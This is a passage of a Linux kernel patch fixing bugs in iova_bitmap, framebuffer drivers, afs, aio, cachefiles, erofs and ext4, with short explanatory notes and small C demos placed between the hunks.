+-	npages = min(npages,  PAGE_SIZE / sizeof(struct page *));
+-
+ 	/*
+ 	 * Bitmap address to be pinned is calculated via pointer arithmetic
+ 	 * with bitmap u64 word index.
+ 	 */
+ 	addr = bitmap->bitmap + bitmap->mapped_base_index;
+ 
++	/*
++	 * We always cap at the max number of 'struct page' pointers that a
++	 * base page can fit; on x86, for example, that means at most 2M of
++	 * bitmap data.
++	 */
++	npages = min(npages + !!offset_in_page(addr),
++		     PAGE_SIZE / sizeof(struct page *));
++
+ 	ret = pin_user_pages_fast((unsigned long)addr, npages,
+ 				  FOLL_WRITE, mapped->pages);
+ 	if (ret <= 0)
+@@ -246,7 +247,7 @@ struct iova_bitmap *iova_bitmap_alloc(unsigned long iova, size_t length,
+ 
+ 	mapped = &bitmap->mapped;
+ 	mapped->pgshift = __ffs(page_size);
+-	bitmap->bitmap = data;
++	bitmap->bitmap = (u8 __user *)data;
+ 	bitmap->mapped_total_index =
+ 		iova_bitmap_offset_to_index(bitmap, length - 1) + 1;
+ 	bitmap->iova = iova;
+@@ -301,7 +302,7 @@ static unsigned long iova_bitmap_mapped_remaining(struct iova_bitmap *bitmap)
+ 
+ 	remaining = bitmap->mapped_total_index - bitmap->mapped_base_index;
+ 	remaining = min_t(unsigned long, remaining,
+-			  bytes / sizeof(*bitmap->bitmap));
++			  DIV_ROUND_UP(bytes, sizeof(*bitmap->bitmap)));
+ 
+ 	return remaining;
+ }
+@@ -405,6 +406,7 @@ void iova_bitmap_set(struct iova_bitmap *bitmap,
+ 			mapped->pgshift) + mapped->pgoff * BITS_PER_BYTE;
+ 	unsigned long last_bit = (((iova + length - 1) - mapped->iova) >>
+ 			mapped->pgshift) + mapped->pgoff * BITS_PER_BYTE;
++	unsigned long last_page_idx = mapped->npages - 1;
+ 
+ 	do {
+ 		unsigned int page_idx = cur_bit / BITS_PER_PAGE;
+@@ -413,6 +415,9 @@ void iova_bitmap_set(struct iova_bitmap *bitmap,
+ 					 last_bit - cur_bit + 1);
+ 		void *kaddr;
+ 
++		if (unlikely(page_idx > last_page_idx))
++			break;
++
+ 		kaddr = kmap_local_page(mapped->pages[page_idx]);
+ 		bitmap_set(kaddr, offset, nbits);
+ 		kunmap_local(kaddr);
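
Several changes in this hunk follow from retyping the user bitmap pointer
from u64 to u8: C pointer arithmetic scales by the element size, so every
index and size computation switches from 8-byte to 1-byte units (hence the
DIV_ROUND_UP when converting a byte count back into elements). A two-stride
illustration:

#include <stdio.h>
#include <stdint.h>

int main(void)
{
	uint64_t words[4];
	uint64_t *as_u64 = words;
	uint8_t *as_u8 = (uint8_t *)words;

	/* 'ptr + 1' advances by sizeof(*ptr) bytes, not by one byte. */
	printf("u64 stride: %td bytes\n",
	       (char *)(as_u64 + 1) - (char *)as_u64);
	printf("u8 stride:  %td bytes\n",
	       (char *)(as_u8 + 1) - (char *)as_u8);
	return 0;
}
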
+diff --git a/drivers/video/fbdev/savage/savagefb_driver.c b/drivers/video/fbdev/savage/savagefb_driver.c
+index b7818b652698f..a7b63c475f954 100644
+--- a/drivers/video/fbdev/savage/savagefb_driver.c
++++ b/drivers/video/fbdev/savage/savagefb_driver.c
+@@ -869,6 +869,9 @@ static int savagefb_check_var(struct fb_var_screeninfo   *var,
+ 
+ 	DBG("savagefb_check_var");
+ 
++	if (!var->pixclock)
++		return -EINVAL;
++
+ 	var->transp.offset = 0;
+ 	var->transp.length = 0;
+ 	switch (var->bits_per_pixel) {
+diff --git a/drivers/video/fbdev/sis/sis_main.c b/drivers/video/fbdev/sis/sis_main.c
+index 1c197c3f95381..fe8996461b9ef 100644
+--- a/drivers/video/fbdev/sis/sis_main.c
++++ b/drivers/video/fbdev/sis/sis_main.c
+@@ -1475,6 +1475,8 @@ sisfb_check_var(struct fb_var_screeninfo *var, struct fb_info *info)
+ 
+ 	vtotal = var->upper_margin + var->lower_margin + var->vsync_len;
+ 
++	if (!var->pixclock)
++		return -EINVAL;
+ 	pixclock = var->pixclock;
+ 
+ 	if((var->vmode & FB_VMODE_MASK) == FB_VMODE_NONINTERLACED) {
+diff --git a/fs/afs/volume.c b/fs/afs/volume.c
+index 1c9144e3e83ac..a146d70efa650 100644
+--- a/fs/afs/volume.c
++++ b/fs/afs/volume.c
+@@ -341,7 +341,7 @@ static int afs_update_volume_status(struct afs_volume *volume, struct key *key)
+ {
+ 	struct afs_server_list *new, *old, *discard;
+ 	struct afs_vldb_entry *vldb;
+-	char idbuf[16];
++	char idbuf[24];
+ 	int ret, idsz;
+ 
+ 	_enter("");
+@@ -349,7 +349,7 @@ static int afs_update_volume_status(struct afs_volume *volume, struct key *key)
+ 	/* We look up an ID by passing it as a decimal string in the
+ 	 * operation's name parameter.
+ 	 */
+-	idsz = sprintf(idbuf, "%llu", volume->vid);
++	idsz = snprintf(idbuf, sizeof(idbuf), "%llu", volume->vid);
+ 
+ 	vldb = afs_vl_lookup_vldb(volume->cell, key, idbuf, idsz);
+ 	if (IS_ERR(vldb)) {
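
The buffer grows from 16 to 24 bytes because a 64-bit volume ID can take up
to 20 decimal digits plus a NUL terminator, and snprintf() (unlike the
sprintf() it replaces) guarantees the output is truncated rather than
overflowing. A quick check with the worst-case value:

#include <stdio.h>
#include <stdint.h>

int main(void)
{
	char idbuf[24];
	uint64_t vid = UINT64_MAX; /* 18446744073709551615: 20 digits */
	int idsz = snprintf(idbuf, sizeof(idbuf), "%llu",
			    (unsigned long long)vid);

	/* 20 characters fit in 24 bytes; char[16] would have overflowed. */
	printf("%d bytes: %s\n", idsz, idbuf);
	return 0;
}
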
+diff --git a/fs/aio.c b/fs/aio.c
+index e85ba0b77f596..849c3e3ed558b 100644
+--- a/fs/aio.c
++++ b/fs/aio.c
+@@ -595,6 +595,13 @@ void kiocb_set_cancel_fn(struct kiocb *iocb, kiocb_cancel_fn *cancel)
+ 	struct kioctx *ctx = req->ki_ctx;
+ 	unsigned long flags;
+ 
++	/*
++	 * kiocb didn't come from aio or is neither a read nor a write, hence
++	 * ignore it.
++	 */
++	if (!(iocb->ki_flags & IOCB_AIO_RW))
++		return;
++
+ 	if (WARN_ON_ONCE(!list_empty(&req->ki_list)))
+ 		return;
+ 
+@@ -1476,7 +1483,7 @@ static int aio_prep_rw(struct kiocb *req, const struct iocb *iocb)
+ 	req->ki_complete = aio_complete_rw;
+ 	req->private = NULL;
+ 	req->ki_pos = iocb->aio_offset;
+-	req->ki_flags = req->ki_filp->f_iocb_flags;
++	req->ki_flags = req->ki_filp->f_iocb_flags | IOCB_AIO_RW;
+ 	if (iocb->aio_flags & IOCB_FLAG_RESFD)
+ 		req->ki_flags |= IOCB_EVENTFD;
+ 	if (iocb->aio_flags & IOCB_FLAG_IOPRIO) {
+diff --git a/fs/cachefiles/cache.c b/fs/cachefiles/cache.c
+index 7077f72e6f474..f449f7340aad0 100644
+--- a/fs/cachefiles/cache.c
++++ b/fs/cachefiles/cache.c
+@@ -168,6 +168,8 @@ int cachefiles_add_cache(struct cachefiles_cache *cache)
+ 	dput(root);
+ error_open_root:
+ 	cachefiles_end_secure(cache, saved_cred);
++	put_cred(cache->cache_cred);
++	cache->cache_cred = NULL;
+ error_getsec:
+ 	fscache_relinquish_cache(cache_cookie);
+ 	cache->cache = NULL;
+diff --git a/fs/cachefiles/daemon.c b/fs/cachefiles/daemon.c
+index aa4efcabb5e37..5f4df9588620f 100644
+--- a/fs/cachefiles/daemon.c
++++ b/fs/cachefiles/daemon.c
+@@ -805,6 +805,7 @@ static void cachefiles_daemon_unbind(struct cachefiles_cache *cache)
+ 	cachefiles_put_directory(cache->graveyard);
+ 	cachefiles_put_directory(cache->store);
+ 	mntput(cache->mnt);
++	put_cred(cache->cache_cred);
+ 
+ 	kfree(cache->rootdirname);
+ 	kfree(cache->secctx);
+diff --git a/fs/erofs/compress.h b/fs/erofs/compress.h
+index 26fa170090b8f..c4a3187bdb8fc 100644
+--- a/fs/erofs/compress.h
++++ b/fs/erofs/compress.h
+@@ -21,6 +21,8 @@ struct z_erofs_decompress_req {
+ };
+ 
+ struct z_erofs_decompressor {
++	int (*config)(struct super_block *sb, struct erofs_super_block *dsb,
++		      void *data, int size);
+ 	int (*decompress)(struct z_erofs_decompress_req *rq,
+ 			  struct page **pagepool);
+ 	char *name;
+@@ -93,6 +95,8 @@ int z_erofs_decompress(struct z_erofs_decompress_req *rq,
+ 		       struct page **pagepool);
+ 
+ /* prototypes for specific algorithms */
++int z_erofs_load_lzma_config(struct super_block *sb,
++			struct erofs_super_block *dsb, void *data, int size);
+ int z_erofs_lzma_decompress(struct z_erofs_decompress_req *rq,
+ 			    struct page **pagepool);
+ #endif
+diff --git a/fs/erofs/decompressor.c b/fs/erofs/decompressor.c
+index 0cfad74374ca9..1eefa4411e066 100644
+--- a/fs/erofs/decompressor.c
++++ b/fs/erofs/decompressor.c
+@@ -24,11 +24,11 @@ struct z_erofs_lz4_decompress_ctx {
+ 	unsigned int oend;
+ };
+ 
+-int z_erofs_load_lz4_config(struct super_block *sb,
+-			    struct erofs_super_block *dsb,
+-			    struct z_erofs_lz4_cfgs *lz4, int size)
++static int z_erofs_load_lz4_config(struct super_block *sb,
++			    struct erofs_super_block *dsb, void *data, int size)
+ {
+ 	struct erofs_sb_info *sbi = EROFS_SB(sb);
++	struct z_erofs_lz4_cfgs *lz4 = data;
+ 	u16 distance;
+ 
+ 	if (lz4) {
+@@ -374,17 +374,71 @@ static struct z_erofs_decompressor decompressors[] = {
+ 		.name = "interlaced"
+ 	},
+ 	[Z_EROFS_COMPRESSION_LZ4] = {
++		.config = z_erofs_load_lz4_config,
+ 		.decompress = z_erofs_lz4_decompress,
+ 		.name = "lz4"
+ 	},
+ #ifdef CONFIG_EROFS_FS_ZIP_LZMA
+ 	[Z_EROFS_COMPRESSION_LZMA] = {
++		.config = z_erofs_load_lzma_config,
+ 		.decompress = z_erofs_lzma_decompress,
+ 		.name = "lzma"
+ 	},
+ #endif
+ };
+ 
++int z_erofs_parse_cfgs(struct super_block *sb, struct erofs_super_block *dsb)
++{
++	struct erofs_sb_info *sbi = EROFS_SB(sb);
++	struct erofs_buf buf = __EROFS_BUF_INITIALIZER;
++	unsigned int algs, alg;
++	erofs_off_t offset;
++	int size, ret = 0;
++
++	if (!erofs_sb_has_compr_cfgs(sbi)) {
++		sbi->available_compr_algs = 1 << Z_EROFS_COMPRESSION_LZ4;
++		return z_erofs_load_lz4_config(sb, dsb, NULL, 0);
++	}
++
++	sbi->available_compr_algs = le16_to_cpu(dsb->u1.available_compr_algs);
++	if (sbi->available_compr_algs & ~Z_EROFS_ALL_COMPR_ALGS) {
++		erofs_err(sb, "unidentified algorithms %x, please upgrade kernel",
++			  sbi->available_compr_algs & ~Z_EROFS_ALL_COMPR_ALGS);
++		return -EOPNOTSUPP;
++	}
++
++	offset = EROFS_SUPER_OFFSET + sbi->sb_size;
++	alg = 0;
++	for (algs = sbi->available_compr_algs; algs; algs >>= 1, ++alg) {
++		void *data;
++
++		if (!(algs & 1))
++			continue;
++
++		data = erofs_read_metadata(sb, &buf, &offset, &size);
++		if (IS_ERR(data)) {
++			ret = PTR_ERR(data);
++			break;
++		}
++
++		if (alg >= ARRAY_SIZE(decompressors) ||
++		    !decompressors[alg].config) {
++			erofs_err(sb, "algorithm %d isn't enabled on this kernel",
++				  alg);
++			ret = -EOPNOTSUPP;
++		} else {
++			ret = decompressors[alg].config(sb,
++					dsb, data, size);
++		}
++
++		kfree(data);
++		if (ret)
++			break;
++	}
++	erofs_put_metabuf(&buf);
++	return ret;
++}
++
+ int z_erofs_decompress(struct z_erofs_decompress_req *rq,
+ 		       struct page **pagepool)
+ {
+diff --git a/fs/erofs/decompressor_lzma.c b/fs/erofs/decompressor_lzma.c
+index 49addc345aebe..970464c4b6769 100644
+--- a/fs/erofs/decompressor_lzma.c
++++ b/fs/erofs/decompressor_lzma.c
+@@ -72,10 +72,10 @@ int z_erofs_lzma_init(void)
+ }
+ 
+ int z_erofs_load_lzma_config(struct super_block *sb,
+-			     struct erofs_super_block *dsb,
+-			     struct z_erofs_lzma_cfgs *lzma, int size)
++			struct erofs_super_block *dsb, void *data, int size)
+ {
+ 	static DEFINE_MUTEX(lzma_resize_mutex);
++	struct z_erofs_lzma_cfgs *lzma = data;
+ 	unsigned int dict_size, i;
+ 	struct z_erofs_lzma *strm, *head = NULL;
+ 	int err;
+diff --git a/fs/erofs/internal.h b/fs/erofs/internal.h
+index d8d09fc3ed655..79a7a5815ea63 100644
+--- a/fs/erofs/internal.h
++++ b/fs/erofs/internal.h
+@@ -471,6 +471,8 @@ struct erofs_map_dev {
+ 
+ /* data.c */
+ extern const struct file_operations erofs_file_fops;
++void *erofs_read_metadata(struct super_block *sb, struct erofs_buf *buf,
++			  erofs_off_t *offset, int *lengthp);
+ void erofs_unmap_metabuf(struct erofs_buf *buf);
+ void erofs_put_metabuf(struct erofs_buf *buf);
+ void *erofs_bread(struct erofs_buf *buf, struct inode *inode,
+@@ -565,9 +567,7 @@ void z_erofs_exit_zip_subsystem(void);
+ int erofs_try_to_free_all_cached_pages(struct erofs_sb_info *sbi,
+ 				       struct erofs_workgroup *egrp);
+ int erofs_try_to_free_cached_page(struct page *page);
+-int z_erofs_load_lz4_config(struct super_block *sb,
+-			    struct erofs_super_block *dsb,
+-			    struct z_erofs_lz4_cfgs *lz4, int len);
++int z_erofs_parse_cfgs(struct super_block *sb, struct erofs_super_block *dsb);
+ #else
+ static inline void erofs_shrinker_register(struct super_block *sb) {}
+ static inline void erofs_shrinker_unregister(struct super_block *sb) {}
+@@ -575,36 +575,14 @@ static inline int erofs_init_shrinker(void) { return 0; }
+ static inline void erofs_exit_shrinker(void) {}
+ static inline int z_erofs_init_zip_subsystem(void) { return 0; }
+ static inline void z_erofs_exit_zip_subsystem(void) {}
+-static inline int z_erofs_load_lz4_config(struct super_block *sb,
+-				  struct erofs_super_block *dsb,
+-				  struct z_erofs_lz4_cfgs *lz4, int len)
+-{
+-	if (lz4 || dsb->u1.lz4_max_distance) {
+-		erofs_err(sb, "lz4 algorithm isn't enabled");
+-		return -EINVAL;
+-	}
+-	return 0;
+-}
+ #endif	/* !CONFIG_EROFS_FS_ZIP */
+ 
+ #ifdef CONFIG_EROFS_FS_ZIP_LZMA
+ int z_erofs_lzma_init(void);
+ void z_erofs_lzma_exit(void);
+-int z_erofs_load_lzma_config(struct super_block *sb,
+-			     struct erofs_super_block *dsb,
+-			     struct z_erofs_lzma_cfgs *lzma, int size);
+ #else
+ static inline int z_erofs_lzma_init(void) { return 0; }
+ static inline int z_erofs_lzma_exit(void) { return 0; }
+-static inline int z_erofs_load_lzma_config(struct super_block *sb,
+-			     struct erofs_super_block *dsb,
+-			     struct z_erofs_lzma_cfgs *lzma, int size) {
+-	if (lzma) {
+-		erofs_err(sb, "lzma algorithm isn't enabled");
+-		return -EINVAL;
+-	}
+-	return 0;
+-}
+ #endif	/* !CONFIG_EROFS_FS_ZIP */
+ 
+ /* flags for erofs_fscache_register_cookie() */
+diff --git a/fs/erofs/namei.c b/fs/erofs/namei.c
+index 0dc34721080c7..e8ccaa761bd63 100644
+--- a/fs/erofs/namei.c
++++ b/fs/erofs/namei.c
+@@ -137,24 +137,24 @@ static void *find_target_block_classic(struct erofs_buf *target,
+ 			/* string comparison without already matched prefix */
+ 			diff = erofs_dirnamecmp(name, &dname, &matched);
+ 
+-			if (!diff) {
+-				*_ndirents = 0;
+-				goto out;
+-			} else if (diff > 0) {
+-				head = mid + 1;
+-				startprfx = matched;
+-
+-				if (!IS_ERR(candidate))
+-					erofs_put_metabuf(target);
+-				*target = buf;
+-				candidate = de;
+-				*_ndirents = ndirents;
+-			} else {
++			if (diff < 0) {
+ 				erofs_put_metabuf(&buf);
+-
+ 				back = mid - 1;
+ 				endprfx = matched;
++				continue;
++			}
++
++			if (!IS_ERR(candidate))
++				erofs_put_metabuf(target);
++			*target = buf;
++			if (!diff) {
++				*_ndirents = 0;
++				return de;
+ 			}
++			head = mid + 1;
++			startprfx = matched;
++			candidate = de;
++			*_ndirents = ndirents;
+ 			continue;
+ 		}
+ out:		/* free if the candidate is valid */
+diff --git a/fs/erofs/super.c b/fs/erofs/super.c
+index bd8bf8fc2f5df..f2647126cb2fb 100644
+--- a/fs/erofs/super.c
++++ b/fs/erofs/super.c
+@@ -126,8 +126,8 @@ static bool check_layout_compatibility(struct super_block *sb,
+ 
+ #ifdef CONFIG_EROFS_FS_ZIP
+ /* read variable-sized metadata, offset will be aligned by 4-byte */
+-static void *erofs_read_metadata(struct super_block *sb, struct erofs_buf *buf,
+-				 erofs_off_t *offset, int *lengthp)
++void *erofs_read_metadata(struct super_block *sb, struct erofs_buf *buf,
++			  erofs_off_t *offset, int *lengthp)
+ {
+ 	u8 *buffer, *ptr;
+ 	int len, i, cnt;
+@@ -159,64 +159,15 @@ static void *erofs_read_metadata(struct super_block *sb, struct erofs_buf *buf,
+ 	}
+ 	return buffer;
+ }
+-
+-static int erofs_load_compr_cfgs(struct super_block *sb,
+-				 struct erofs_super_block *dsb)
+-{
+-	struct erofs_sb_info *sbi = EROFS_SB(sb);
+-	struct erofs_buf buf = __EROFS_BUF_INITIALIZER;
+-	unsigned int algs, alg;
+-	erofs_off_t offset;
+-	int size, ret = 0;
+-
+-	sbi->available_compr_algs = le16_to_cpu(dsb->u1.available_compr_algs);
+-	if (sbi->available_compr_algs & ~Z_EROFS_ALL_COMPR_ALGS) {
+-		erofs_err(sb, "try to load compressed fs with unsupported algorithms %x",
+-			  sbi->available_compr_algs & ~Z_EROFS_ALL_COMPR_ALGS);
+-		return -EINVAL;
+-	}
+-
+-	offset = EROFS_SUPER_OFFSET + sbi->sb_size;
+-	alg = 0;
+-	for (algs = sbi->available_compr_algs; algs; algs >>= 1, ++alg) {
+-		void *data;
+-
+-		if (!(algs & 1))
+-			continue;
+-
+-		data = erofs_read_metadata(sb, &buf, &offset, &size);
+-		if (IS_ERR(data)) {
+-			ret = PTR_ERR(data);
+-			break;
+-		}
+-
+-		switch (alg) {
+-		case Z_EROFS_COMPRESSION_LZ4:
+-			ret = z_erofs_load_lz4_config(sb, dsb, data, size);
+-			break;
+-		case Z_EROFS_COMPRESSION_LZMA:
+-			ret = z_erofs_load_lzma_config(sb, dsb, data, size);
+-			break;
+-		default:
+-			DBG_BUGON(1);
+-			ret = -EFAULT;
+-		}
+-		kfree(data);
+-		if (ret)
+-			break;
+-	}
+-	erofs_put_metabuf(&buf);
+-	return ret;
+-}
+ #else
+-static int erofs_load_compr_cfgs(struct super_block *sb,
+-				 struct erofs_super_block *dsb)
++static int z_erofs_parse_cfgs(struct super_block *sb,
++			      struct erofs_super_block *dsb)
+ {
+-	if (dsb->u1.available_compr_algs) {
+-		erofs_err(sb, "try to load compressed fs when compression is disabled");
+-		return -EINVAL;
+-	}
+-	return 0;
++	if (!dsb->u1.available_compr_algs)
++		return 0;
++
++	erofs_err(sb, "compression disabled, unable to mount compressed EROFS");
++	return -EOPNOTSUPP;
+ }
+ #endif
+ 
+@@ -398,10 +349,7 @@ static int erofs_read_superblock(struct super_block *sb)
+ 	}
+ 
+ 	/* parse on-disk compression configurations */
+-	if (erofs_sb_has_compr_cfgs(sbi))
+-		ret = erofs_load_compr_cfgs(sb, dsb);
+-	else
+-		ret = z_erofs_load_lz4_config(sb, dsb, NULL, 0);
++	ret = z_erofs_parse_cfgs(sb, dsb);
+ 	if (ret < 0)
+ 		goto out;
+ 
+diff --git a/fs/erofs/zmap.c b/fs/erofs/zmap.c
+index 0337b70b2dac4..abcded1acd194 100644
+--- a/fs/erofs/zmap.c
++++ b/fs/erofs/zmap.c
+@@ -610,7 +610,7 @@ static int z_erofs_do_map_blocks(struct inode *inode,
+ 		.map = map,
+ 	};
+ 	int err = 0;
+-	unsigned int lclusterbits, endoff;
++	unsigned int lclusterbits, endoff, afmt;
+ 	unsigned long initial_lcn;
+ 	unsigned long long ofs, end;
+ 
+@@ -700,17 +700,20 @@ static int z_erofs_do_map_blocks(struct inode *inode,
+ 			err = -EFSCORRUPTED;
+ 			goto unmap_out;
+ 		}
+-		if (vi->z_advise & Z_EROFS_ADVISE_INTERLACED_PCLUSTER)
+-			map->m_algorithmformat =
+-				Z_EROFS_COMPRESSION_INTERLACED;
+-		else
+-			map->m_algorithmformat =
+-				Z_EROFS_COMPRESSION_SHIFTED;
+-	} else if (m.headtype == Z_EROFS_VLE_CLUSTER_TYPE_HEAD2) {
+-		map->m_algorithmformat = vi->z_algorithmtype[1];
++		afmt = vi->z_advise & Z_EROFS_ADVISE_INTERLACED_PCLUSTER ?
++			Z_EROFS_COMPRESSION_INTERLACED :
++			Z_EROFS_COMPRESSION_SHIFTED;
+ 	} else {
+-		map->m_algorithmformat = vi->z_algorithmtype[0];
++		afmt = m.headtype == Z_EROFS_VLE_CLUSTER_TYPE_HEAD2 ?
++			vi->z_algorithmtype[1] : vi->z_algorithmtype[0];
++		if (!(EROFS_I_SB(inode)->available_compr_algs & (1 << afmt))) {
++			erofs_err(inode->i_sb, "inconsistent algorithmtype %u for nid %llu",
++				  afmt, vi->nid);
++			err = -EFSCORRUPTED;
++			goto unmap_out;
++		}
+ 	}
++	map->m_algorithmformat = afmt;
+ 
+ 	if ((flags & EROFS_GET_BLOCKS_FIEMAP) ||
+ 	    ((flags & EROFS_GET_BLOCKS_READMORE) &&
+diff --git a/fs/ext4/extents.c b/fs/ext4/extents.c
+index aa5aadd70bbc2..67af684e44e6e 100644
+--- a/fs/ext4/extents.c
++++ b/fs/ext4/extents.c
+@@ -2229,7 +2229,7 @@ static int ext4_fill_es_cache_info(struct inode *inode,
+ 
+ 
+ /*
+- * ext4_ext_determine_hole - determine hole around given block
++ * ext4_ext_find_hole - find hole around given block according to the given path
+  * @inode:	inode we lookup in
+  * @path:	path in extent tree to @lblk
+  * @lblk:	pointer to logical block around which we want to determine hole
+@@ -2241,9 +2241,9 @@ static int ext4_fill_es_cache_info(struct inode *inode,
+  * The function returns the length of a hole starting at @lblk. We update @lblk
+  * to the beginning of the hole if we managed to find it.
+  */
+-static ext4_lblk_t ext4_ext_determine_hole(struct inode *inode,
+-					   struct ext4_ext_path *path,
+-					   ext4_lblk_t *lblk)
++static ext4_lblk_t ext4_ext_find_hole(struct inode *inode,
++				      struct ext4_ext_path *path,
++				      ext4_lblk_t *lblk)
+ {
+ 	int depth = ext_depth(inode);
+ 	struct ext4_extent *ex;
+@@ -2270,30 +2270,6 @@ static ext4_lblk_t ext4_ext_determine_hole(struct inode *inode,
+ 	return len;
+ }
+ 
+-/*
+- * ext4_ext_put_gap_in_cache:
+- * calculate boundaries of the gap that the requested block fits into
+- * and cache this gap
+- */
+-static void
+-ext4_ext_put_gap_in_cache(struct inode *inode, ext4_lblk_t hole_start,
+-			  ext4_lblk_t hole_len)
+-{
+-	struct extent_status es;
+-
+-	ext4_es_find_extent_range(inode, &ext4_es_is_delayed, hole_start,
+-				  hole_start + hole_len - 1, &es);
+-	if (es.es_len) {
+-		/* There's delayed extent containing lblock? */
+-		if (es.es_lblk <= hole_start)
+-			return;
+-		hole_len = min(es.es_lblk - hole_start, hole_len);
+-	}
+-	ext_debug(inode, " -> %u:%u\n", hole_start, hole_len);
+-	ext4_es_insert_extent(inode, hole_start, hole_len, ~0,
+-			      EXTENT_STATUS_HOLE);
+-}
+-
+ /*
+  * ext4_ext_rm_idx:
+  * removes index from the index block.
+@@ -4064,6 +4040,69 @@ static int get_implied_cluster_alloc(struct super_block *sb,
+ 	return 0;
+ }
+ 
++/*
++ * Determine the hole length around the given logical block: first try to
++ * locate and expand the hole from the given @path, then adjust it if it is
++ * partially or completely converted to delayed extents, insert it into the
++ * extent cache tree if it is indeed a hole, and finally return the length
++ * of the determined extent.
++ */
++static ext4_lblk_t ext4_ext_determine_insert_hole(struct inode *inode,
++						  struct ext4_ext_path *path,
++						  ext4_lblk_t lblk)
++{
++	ext4_lblk_t hole_start, len;
++	struct extent_status es;
++
++	hole_start = lblk;
++	len = ext4_ext_find_hole(inode, path, &hole_start);
++again:
++	ext4_es_find_extent_range(inode, &ext4_es_is_delayed, hole_start,
++				  hole_start + len - 1, &es);
++	if (!es.es_len)
++		goto insert_hole;
++
++	/*
++	 * There's a delalloc extent in the hole; handle the cases where it is
++	 * in front of, behind, or straddles the queried range.
++	 */
++	if (lblk >= es.es_lblk + es.es_len) {
++		/*
++		 * The delalloc extent is in front of the queried range,
++		 * find again from the queried start block.
++		 */
++		len -= lblk - hole_start;
++		hole_start = lblk;
++		goto again;
++	} else if (in_range(lblk, es.es_lblk, es.es_len)) {
++		/*
++		 * The delalloc extent contains lblk; it must have been added
++		 * after ext4_map_blocks() checked the extent status tree.
++		 * Adjust the length to the part of the delalloc extent that
++		 * lies after lblk.
++		 */
++		len = es.es_lblk + es.es_len - lblk;
++		return len;
++	} else {
++		/*
++		 * The delalloc extent is partially or completely behind
++		 * the queried range, update hole length until the
++		 * beginning of the delalloc extent.
++		 */
++		len = min(es.es_lblk - hole_start, len);
++	}
++
++insert_hole:
++	/* Put just found gap into cache to speed up subsequent requests */
++	ext_debug(inode, " -> %u:%u\n", hole_start, len);
++	ext4_es_insert_extent(inode, hole_start, len, ~0, EXTENT_STATUS_HOLE);
++
++	/* Update hole_len to reflect hole size after lblk */
++	if (hole_start != lblk)
++		len -= lblk - hole_start;
++
++	return len;
++}
+ 
+ /*
+  * Block allocation/map/preallocation routine for extents based files
+@@ -4181,22 +4220,12 @@ int ext4_ext_map_blocks(handle_t *handle, struct inode *inode,
+ 	 * we couldn't try to create block if create flag is zero
+ 	 */
+ 	if ((flags & EXT4_GET_BLOCKS_CREATE) == 0) {
+-		ext4_lblk_t hole_start, hole_len;
++		ext4_lblk_t len;
+ 
+-		hole_start = map->m_lblk;
+-		hole_len = ext4_ext_determine_hole(inode, path, &hole_start);
+-		/*
+-		 * put just found gap into cache to speed up
+-		 * subsequent requests
+-		 */
+-		ext4_ext_put_gap_in_cache(inode, hole_start, hole_len);
++		len = ext4_ext_determine_insert_hole(inode, path, map->m_lblk);
+ 
+-		/* Update hole_len to reflect hole size after map->m_lblk */
+-		if (hole_start != map->m_lblk)
+-			hole_len -= map->m_lblk - hole_start;
+ 		map->m_pblk = 0;
+-		map->m_len = min_t(unsigned int, map->m_len, hole_len);
+-
++		map->m_len = min_t(unsigned int, map->m_len, len);
+ 		goto out;
+ 	}
+ 
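
At its core the new helper classifies the cached delalloc extent against
the queried block and reacts per case. A schematic user-space sketch of
just that three-way decision (the retry loop, cache insertion and length
bookkeeping are left out):

#include <stdio.h>

/* Classify a delalloc extent [es_lblk, es_lblk + es_len) against the
 * queried block lblk, mirroring the three branches in the patch. */
static const char *classify(unsigned lblk, unsigned es_lblk,
			    unsigned es_len)
{
	if (lblk >= es_lblk + es_len)
		return "in front of the query: retry from lblk";
	if (lblk >= es_lblk)
		return "covers lblk: return the extent tail length";
	return "behind the query: trim the hole to es_lblk";
}

int main(void)
{
	printf("%s\n", classify(12, 4, 4));  /* in front */
	printf("%s\n", classify(12, 10, 4)); /* covers   */
	printf("%s\n", classify(12, 20, 4)); /* behind   */
	return 0;
}
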
+diff --git a/fs/ext4/mballoc.c b/fs/ext4/mballoc.c
+index 1a310ee7d9e55..6a3e27771df73 100644
+--- a/fs/ext4/mballoc.c
++++ b/fs/ext4/mballoc.c
+@@ -831,7 +831,7 @@ mb_update_avg_fragment_size(struct super_block *sb, struct ext4_group_info *grp)
+ 	struct ext4_sb_info *sbi = EXT4_SB(sb);
+ 	int new_order;
+ 
+-	if (!test_opt2(sb, MB_OPTIMIZE_SCAN) || grp->bb_free == 0)
++	if (!test_opt2(sb, MB_OPTIMIZE_SCAN) || grp->bb_fragments == 0)
+ 		return;
+ 
+ 	new_order = mb_avg_fragment_size_order(sb,
+@@ -2176,6 +2176,9 @@ int ext4_mb_try_best_found(struct ext4_allocation_context *ac,
+ 		return err;
+ 
+ 	ext4_lock_group(ac->ac_sb, group);
++	if (unlikely(EXT4_MB_GRP_BBITMAP_CORRUPT(e4b->bd_info)))
++		goto out;
++
+ 	max = mb_find_extent(e4b, ex.fe_start, ex.fe_len, &ex);
+ 
+ 	if (max > 0) {
+@@ -2183,6 +2186,7 @@ int ext4_mb_try_best_found(struct ext4_allocation_context *ac,
+ 		ext4_mb_use_best_found(ac, e4b);
+ 	}
+ 
++out:
+ 	ext4_unlock_group(ac->ac_sb, group);
+ 	ext4_mb_unload_buddy(e4b);
+ 
+@@ -2211,12 +2215,10 @@ int ext4_mb_find_by_goal(struct ext4_allocation_context *ac,
+ 	if (err)
+ 		return err;
+ 
+-	if (unlikely(EXT4_MB_GRP_BBITMAP_CORRUPT(e4b->bd_info))) {
+-		ext4_mb_unload_buddy(e4b);
+-		return 0;
+-	}
+-
+ 	ext4_lock_group(ac->ac_sb, group);
++	if (unlikely(EXT4_MB_GRP_BBITMAP_CORRUPT(e4b->bd_info)))
++		goto out;
++
+ 	max = mb_find_extent(e4b, ac->ac_g_ex.fe_start,
+ 			     ac->ac_g_ex.fe_len, &ex);
+ 	ex.fe_logical = 0xDEADFA11; /* debug value */
+@@ -2249,6 +2251,7 @@ int ext4_mb_find_by_goal(struct ext4_allocation_context *ac,
+ 		ac->ac_b_ex = ex;
+ 		ext4_mb_use_best_found(ac, e4b);
+ 	}
++out:
+ 	ext4_unlock_group(ac->ac_sb, group);
+ 	ext4_mb_unload_buddy(e4b);
+ 
+diff --git a/fs/ntfs3/attrib.c b/fs/ntfs3/attrib.c
+index 2215179c925b3..2618bf5a37892 100644
+--- a/fs/ntfs3/attrib.c
++++ b/fs/ntfs3/attrib.c
+@@ -1658,8 +1658,10 @@ int attr_allocate_frame(struct ntfs_inode *ni, CLST frame, size_t compr_size,
+ 			le_b = NULL;
